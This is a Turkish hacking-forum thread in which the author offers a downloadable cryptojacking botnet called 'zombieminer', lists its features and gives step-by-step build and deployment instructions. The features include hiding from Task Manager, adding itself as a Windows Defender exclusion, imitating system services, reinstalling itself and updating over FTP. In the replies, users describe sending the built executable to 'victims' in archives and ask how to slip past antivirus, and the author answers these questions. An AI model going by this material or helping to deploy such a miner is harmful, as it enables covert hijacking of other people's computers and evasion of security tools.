Crypto Coin Mining Botnet: Zombi sistemlerde kendi coininizi kazın

zalim5811

Üye
3 Eki 2012
72
30
Nerdeyse 2 sene önce paylaştığım postu belki hatırlayan olur: Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın

Şimdi de eskiden C++ ve Python ile yazdığım sistemin genel olarak aynı işlevde olan ve 0'dan tamamen Rust ile yazdığım çok daha gelişmiş versiyonunu paylaşıyorum.

Çalışma prensibi:
- Kendini hedef sisteme yerleştirerek periyodik olarak kullanıcının bilgisayarı kullanma durumuna göre mining yapar.
- FTP üzerinden güncelleme alabilir.
- Kullanıcıya fark edilmemek için görev yönetcisi açıldığında miningi duraklatır. (bu ayar config dosyasından değiştirilebilir)
- CPU mining yapar ve yalnızca NiceHash pool üzerinden RandomX Monero mine'lar.
- Windows Defender'a yakalanmamak için kendi binary'sini exclusion olarak ekler.
- Sistem idle'da iken bütün cpu gücünü kullanarak, sistem kullanımda iken ise config'de belirtilmiş ayarlara göre mining yapar.

Başlamak için adımlar:
1. NiceHash - Leading Cryptocurrency Platform for Mining and Trading üzerinden nicehash hesabı açın.
2.
Üye olup giriş yaptıkan sonra yukarıdan Mining sekmesine gelip Mining Address butonundan cüzdan adresinizi alın.
3. Aşağıdaki linkten zombieminr'i indirin ve config.json dosyasını düzenlemek için açın.
4. Seçeneklerin hepsinin açıklamaları config dosyasında. nicehash_address'e az önce nicehash'den aldığınız cüzdan adresinizi girin ve diğer ayarları da istenilen gibi düzenleyerek config.json'u kaydedin.
5. ui.exe'yi açıp exe buildlemek için konsola B yazıp enterlayın. miner-ready klasöründe miner-ready.exe dosyası oluşacak.
6. miner-ready.exe'yi mining yapılacak zombi sistemde açın.
Tebrikler. Bu kadardı.

* Daha sonra ben güncelleme yapıp burada paylaştığımda veya config.json'u değiştirip göndermek istediğinizde zombi sistemlere update gönderebilmek ve mininge devam edebilmek için config.json'da FTP bölümlerini doldurmalısınız. Tek kullanımlık, içinde önemli şeyler olmayan bir FTP sunucusu seçin çünkü exe boyutunu küçük tutabilmek için ssl librarylerini eklemedim, ftp bağlantısı tls üzerinden olmayacak. Ben ftp serverını ücretsiz olarak 000webhost.com'dan alıyorum.

* Drive linkinde bir de cleaner.exe bıraktım. Kendi sisteminizde açıp test etmeniz durumunda cleaner'ı açarak sistemi miner'dan temizleyebilirsiniz.

VIRUSTOTAL: VirusTotal

DRIVE DOWNLOAD: ZOMBIEMINER - Google Drive
 

Eagleweb

Kıdemli Üye
8 May 2021
2,120
1,151
localhost/e8
Merhaba,
Nakit kazanmaya ihtiyacı olan arkadaşları idare eder bence uzun bir süre başarılar dilerim güzel konu, var olan kodları sizmi yazdınız yazınızda öyle demişsiniz daha önceki yazınızda ilgili yazı linki : Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın


bopcd2a.gif
 
19 May 2020
238
84
Nerdeyse 2 sene önce paylaştığım postu belki hatırlayan olur: Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın

Şimdi de eskiden C++ ve Python ile yazdığım sistemin genel olarak aynı işlevde olan ve 0'dan tamamen Rust ile yazdığım çok daha gelişmiş versiyonunu paylaşıyorum.


Çalışma prensibi:
- Kendini hedef sisteme yerleştirerek periyodik olarak kullanıcının bilgisayarı kullanma durumuna göre mining yapar.
- FTP üzerinden güncelleme alabilir.
- Kullanıcıya fark edilmemek için görev yönetcisi açıldığında miningi duraklatır. (bu ayar config dosyasından değiştirilebilir)
- CPU mining yapar ve yalnızca NiceHash pool üzerinden RandomX Monero mine'lar.
- Windows Defender'a yakalanmamak için kendi binary'sini exclusion olarak ekler.
- Sistem idle'da iken bütün cpu gücünü kullanarak, sistem kullanımda iken ise config'de belirtilmiş ayarlara göre mining yapar.


Başlamak için adımlar:
1. NiceHash - Leading Cryptocurrency Platform for Mining and Trading üzerinden nicehash hesabı açın.
2.
Üye olup giriş yaptıkan sonra yukarıdan Mining sekmesine gelip Mining Address butonundan cüzdan adresinizi alın.
3. Aşağıdaki linkten zombieminr'i indirin ve config.json dosyasını düzenlemek için açın.
4. Seçeneklerin hepsinin açıklamaları config dosyasında. nicehash_address'e az önce nicehash'den aldığınız cüzdan adresinizi girin ve diğer ayarları da istenilen gibi düzenleyerek config.json'u kaydedin.
5. ui.exe'yi açıp exe buildlemek için konsola B yazıp enterlayın. miner-ready klasöründe miner-ready.exe dosyası oluşacak.
6. miner-ready.exe'yi mining yapılacak zombi sistemde açın.
Tebrikler. Bu kadardı.

* Daha sonra ben güncelleme yapıp burada paylaştığımda veya config.json'u değiştirip göndermek istediğinizde zombi sistemlere update gönderebilmek ve mininge devam edebilmek için config.json'da FTP bölümlerini doldurmalısınız. Tek kullanımlık, içinde önemli şeyler olmayan bir FTP sunucusu seçin çünkü exe boyutunu küçük tutabilmek için ssl librarylerini eklemedim, ftp bağlantısı tls üzerinden olmayacak. Ben ftp serverını ücretsiz olarak 000webhost.com'dan alıyorum.

* Drive linkinde bir de cleaner.exe bıraktım. Kendi sisteminizde açıp test etmeniz durumunda cleaner'ı açarak sistemi miner'dan temizleyebilirsiniz.

VIRUSTOTAL: VirusTotal

DRIVE DOWNLOAD: ZOMBIEMINER - Google Drive
dostum ben bunu webe uyarlamak ve botnet değil de, kullanıcının mining yaptığının farkında olarak hazırlamak isterim. ancak adreste exe olarak paylaştığın için, yapılandırma ayarları dışında bir dosya yok. çalışmaya dair özelden bilgi vermen mümkün? aldığım bilgiler doğrultusuna javascripte uyarlama niyetindeyim. gerçi o tarihlerde randomx algoritması ile çalışan ve moneroya özel olan bir mining apisi mevcuttu. şuan değil. bu apiyi kullanarak yazdıysan zaten şuan çalışmaz.
 

zalim5811

Üye
3 Eki 2012
72
30
Merhabalar hocam build yaparken böyle bi hata alıyorum sebebi nedir FTP yi false yaptım bir de
4yOqH.jpg
ui.exe icinde bosluk olan bi directoryde oldugu icin.

dostum ben bunu webe uyarlamak ve botnet değil de, kullanıcının mining yaptığının farkında olarak hazırlamak isterim. ancak adreste exe olarak paylaştığın için, yapılandırma ayarları dışında bir dosya yok. çalışmaya dair özelden bilgi vermen mümkün? aldığım bilgiler doğrultusuna javascripte uyarlama niyetindeyim. gerçi o tarihlerde randomx algoritması ile çalışan ve moneroya özel olan bir mining apisi mevcuttu. şuan değil. bu apiyi kullanarak yazdıysan zaten şuan çalışmaz.
Mining kısmını ben yazmadım opensource windows targeted bi miner kullanıyorum. Isine yarayacak bir sey bulamazsın paylaşam bile cunku native kodu alıp direkt browserda calıstırma gibi bi olay yok. Ayrıca javascript ile olacak iş de değil mining computational bi işlem olduğu için webassembly yazman gerekir. Internette daha fazla bilgi vardır. Benim program işine yaramaz her şeyi win32 api ile yapıyorum ben.
 

konigsrasse123

Yeni üye
24 Nis 2016
37
3
ui.exe icinde bosluk olan bi directoryde oldugu icin.
Cevabın için teşekkür ederim %10 donate yazdım şimdi rat ağı kurucam hepimiz kazanicaz bakalim hayırlısı olsun bi sorum daha olucak defender açıkken otomatik siler mi bir de rar içinde yollasam kurban açarsa otomatik olarak sisteme bağlanır mı yani ben karşı tarafa rari upload edicem oda açıcak dosyayı ve sistem çalışıcak doğru mudur?
 

zalim5811

Üye
3 Eki 2012
72
30
Cevabın için teşekkür ederim %10 donate yazdım şimdi rat ağı kurucam hepimiz kazanicaz bakalim hayırlısı olsun bi sorum daha olucak defender açıkken otomatik siler mi bir de rar içinde yollasam kurban açarsa otomatik olarak sisteme bağlanır mı yani ben karşı tarafa rari upload edicem oda açıcak dosyayı ve sistem çalışıcak doğru mudur?
Normalde ilk compileladigimda windows defender static binary halindeyken bulamıyordu ama şu an nedenini çözemedim Trojan:Win32/Sabsik.FL.B!ml olarak algılıyor. Sondaki ML yapay zeka ile bulunduğunu gösteriyor yani aslinda false positive sayilir. Henüz miner/zararlı olarak databaselerinde yok. Açıldıktan sonra defendera yakalanması imkansiz ama kendini exclusion olarak eklediği için.
Arşiv içinden veya normal olarak açılması farketmez. UAC yi geçip yönetici izinleri aldıktan sonra her türlü yerleşir sisteme.
 
19 May 2020
238
84
Mining kısmını ben yazmadım opensource windows targeted bi miner kullanıyorum. Isine yarayacak bir sey bulamazsın paylaşam bile cunku native kodu alıp direkt browserda calıstırma gibi bi olay yok. Ayrıca javascript ile olacak iş de değil mining computational bi işlem olduğu için webassembly yazman gerekir. Internette daha fazla bilgi vardır. Benim program işine yaramaz her şeyi win32 api ile yapıyorum ben.
dostum windows üzerinde bende yapabiliyorum. browser üzerinde böyle bir olay varda, neyse.
 

konigsrasse123

Yeni üye
24 Nis 2016
37
3
Normalde ilk compileladigimda windows defender static binary halindeyken bulamıyordu ama şu an nedenini çözemedim Trojan:Win32/Sabsik.FL.B!ml olarak algılıyor. Sondaki ML yapay zeka ile bulunduğunu gösteriyor yani aslinda false positive sayilir. Henüz miner/zararlı olarak databaselerinde yok. Açıldıktan sonra defendera yakalanması imkansiz ama kendini exclusion olarak eklediği için.
Arşiv içinden veya normal olarak açılması farketmez. UAC yi geçip yönetici izinleri aldıktan sonra her türlü yerleşir sisteme.
Peki sadece build olarak çıkardığımız exe dosyasini karşı taraf çalıştırdığı zaman işlem tamam mıdır? ve bu sistem arkaplanda slient bir şekilde mi çalışır şüphe çekmesi işleri sıkıntıya sokabilir tekrardan teşekkür ederim cevabın için.
 

zalim5811

Üye
3 Eki 2012
72
30
Peki sadece build olarak çıkardığımız exe dosyasini karşı taraf çalıştırdığı zaman işlem tamam mıdır? ve bu sistem arkaplanda slient bir şekilde mi çalışır şüphe çekmesi işleri sıkıntıya sokabilir tekrardan teşekkür ederim cevabın için.
Exenin açilmasi yeterli evet. Arkaplanda sistem hizmetlerini taklit ederek çalışıyor. configteki pause on task manager da açıksa görev yöneticisi açıldıgında minerı duraklatarak cpu kullanımını 0a düsürür belli olmamak için. Yine de süphe cekebilir fanların hızlı calismasindan vs. tam garanti veremem. Kaldırılsa bile kendini yeniden yerleştirme gibi bi ozelligi de var.

0.1.2 versiyonunu yükledim. Nicehash rig isimlendirmesi bozuktu o düzeltildi. Drive'dan indirebilirsiniz:

 

konigsrasse123

Yeni üye
24 Nis 2016
37
3
Tekrardan Merhaba hocam şimdi ben yavaştan kurbanlara yolluyorum yaptığım buildi fakat 2 günde bu kadar kazım yapmış sizce ters giden nedir?
61rhA.jpg
61yl1.jpg
Edit : KENDİ SİSTEMİMİDE EKLEDİM ŞİMDİ O DAHA DETAYLI GÖZÜKÜYOR VE GERÇEKTEN BİŞEYLER KAZMAYA BAŞLIYO DİĞER KURBANLAR İÇİN HİÇ BİR DETAY YOK NEDEN ACABA
61Nic.jpg
 
Son düzenleme:

zalim5811

Üye
3 Eki 2012
72
30
Tekrardan Merhaba hocam şimdi ben yavaştan kurbanlara yolluyorum yaptığım buildi fakat 2 günde bu kadar kazım yapmış sizce ters giden nedir?
61rhA.jpg
61yl1.jpg
Edit : KENDİ SİSTEMİMİDE EKLEDİM ŞİMDİ O DAHA DETAYLI GÖZÜKÜYOR VE GERÇEKTEN BİŞEYLER KAZMAYA BAŞLIYO DİĞER KURBANLAR İÇİN HİÇ BİR DETAY YOK NEDEN ACABA
61Nic.jpg
Detay gozukmuyor cunku nicehash miner kullanmiyorum, kendi makinen de nicehash miner acmissin. Hashrate'in de ondan dusuk olması normal çunku sadece cpu mining yaptırıyorum ben, gpu destegini de ekleyebilirim belki bilmiyorum.
 

konigsrasse123

Yeni üye
24 Nis 2016
37
3
Detay gozukmuyor cunku nicehash miner kullanmiyorum, kendi makinen de nicehash miner acmissin. Hashrate'in de ondan dusuk olması normal çunku sadece cpu mining yaptırıyorum ben, gpu destegini de ekleyebilirim belki bilmiyorum.
CPU mining az kazandırıyo sanki brom nasıl bi çözüm yaparız 2 günde 35 kuruş kazandırmış

Detay gozukmuyor cunku nicehash miner kullanmiyorum, kendi makinen de nicehash miner acmissin. Hashrate'in de ondan dusuk olması normal çunku sadece cpu mining yaptırıyorum ben, gpu destegini de ekleyebilirim belki bilmiyorum.
GPU mining eklersen çok sevinirim bidahaki güncellemeyi bekliyorum

3 makineyle 3 günde 0.17 TL kazandırmış bi problem olmalı yada boşuna uğraşıyoruz bu sistemle
pQscwVjK_Screenshot_2.jpg
 

zalim5811

Üye
3 Eki 2012
72
30
3 makineyle 3 günde 0.17 TL kazandırmış bi problem olmalı yada boşuna uğraşıyoruz bu sistemle
Hashrate'i etkileyecek onlarca faktor var: makinedeki islemci, ne kafar sure acik kaldigi vs. vs.. Minerin farkedilmemesi senin icin onemli degilse pause_on_task_manageri kapat mine_allthetime i aç 7/24 mining yapsin.
az kazanmani ben duzeltemem. tek yapabilecegim gpu mining destegi ile potansiyeli kazancini arttirmak.
 

venom34ed

Katılımcı Üye
6 May 2021
502
106
Hashrate'i etkileyecek onlarca faktor var: makinedeki islemci, ne kafar sure acik kaldigi vs. vs.. Minerin farkedilmemesi senin icin onemli degilse pause_on_task_manageri kapat mine_allthetime i aç 7/24 mining yapsin.
az kazanmani ben duzeltemem. tek yapabilecegim gpu mining destegi ile potansiyeli kazancini arttirmak.
Hocam bu anlattığınız yöntem cryptojacking yöntemi mi ona göre yapmayı düşünüyorum da sanırım cryptojacking yöntemi sorunsuz çalışıyorsa denemek istiyorum da.
 

konigsrasse123

Yeni üye
24 Nis 2016
37
3
Hashrate'i etkileyecek onlarca faktor var: makinedeki islemci, ne kafar sure acik kaldigi vs. vs.. Minerin farkedilmemesi senin icin onemli degilse pause_on_task_manageri kapat mine_allthetime i aç 7/24 mining yapsin.
az kazanmani ben duzeltemem. tek yapabilecegim gpu mining destegi ile potansiyeli kazancini arttirmak.
GPU'nun daha kazançlı olucağına eminim bu şekilde 1 haftada zor 1 tl kazar inanılmaz düşük hashrate güncelleme bekliyelim bakalım umarım kısa zamanda güncellenir teşekkürler ilgilendiğin için
 

Ælaska

Yeni üye
23 Ağu 2021
28
1
Nerdeyse 2 sene önce paylaştığım postu belki hatırlayan olur: Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın

Şimdi de eskiden C++ ve Python ile yazdığım sistemin genel olarak aynı işlevde olan ve 0'dan tamamen Rust ile yazdığım çok daha gelişmiş versiyonunu paylaşıyorum.


Çalışma prensibi:
- Kendini hedef sisteme yerleştirerek periyodik olarak kullanıcının bilgisayarı kullanma durumuna göre mining yapar.
- FTP üzerinden güncelleme alabilir.
- Kullanıcıya fark edilmemek için görev yönetcisi açıldığında miningi duraklatır. (bu ayar config dosyasından değiştirilebilir)
- CPU mining yapar ve yalnızca NiceHash pool üzerinden RandomX Monero mine'lar.
- Windows Defender'a yakalanmamak için kendi binary'sini exclusion olarak ekler.
- Sistem idle'da iken bütün cpu gücünü kullanarak, sistem kullanımda iken ise config'de belirtilmiş ayarlara göre mining yapar.


Başlamak için adımlar:
1. NiceHash - Leading Cryptocurrency Platform for Mining and Trading üzerinden nicehash hesabı açın.
2.
Üye olup giriş yaptıkan sonra yukarıdan Mining sekmesine gelip Mining Address butonundan cüzdan adresinizi alın.
3. Aşağıdaki linkten zombieminr'i indirin ve config.json dosyasını düzenlemek için açın.
4. Seçeneklerin hepsinin açıklamaları config dosyasında. nicehash_address'e az önce nicehash'den aldığınız cüzdan adresinizi girin ve diğer ayarları da istenilen gibi düzenleyerek config.json'u kaydedin.
5. ui.exe'yi açıp exe buildlemek için konsola B yazıp enterlayın. miner-ready klasöründe miner-ready.exe dosyası oluşacak.
6. miner-ready.exe'yi mining yapılacak zombi sistemde açın.
Tebrikler. Bu kadardı.

* Daha sonra ben güncelleme yapıp burada paylaştığımda veya config.json'u değiştirip göndermek istediğinizde zombi sistemlere update gönderebilmek ve mininge devam edebilmek için config.json'da FTP bölümlerini doldurmalısınız. Tek kullanımlık, içinde önemli şeyler olmayan bir FTP sunucusu seçin çünkü exe boyutunu küçük tutabilmek için ssl librarylerini eklemedim, ftp bağlantısı tls üzerinden olmayacak. Ben ftp serverını ücretsiz olarak 000webhost.com'dan alıyorum.

* Drive linkinde bir de cleaner.exe bıraktım. Kendi sisteminizde açıp test etmeniz durumunda cleaner'ı açarak sistemi miner'dan temizleyebilirsiniz.

VIRUSTOTAL: VirusTotal

DRIVE DOWNLOAD: ZOMBIEMINER - Google Drive
config.json ftp_dir adresine tam olarak ne yazmam gerekiyor

GPU'nun daha kazançlı olucağına eminim bu şekilde 1 haftada zor 1 tl kazar inanılmaz düşük hashrate güncelleme bekliyelim bakalım umarım kısa zamanda güncellenir teşekkürler ilgilendiğin için
config.json da ki ftp_dir adresine tam olarak ne yazıyoruz
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.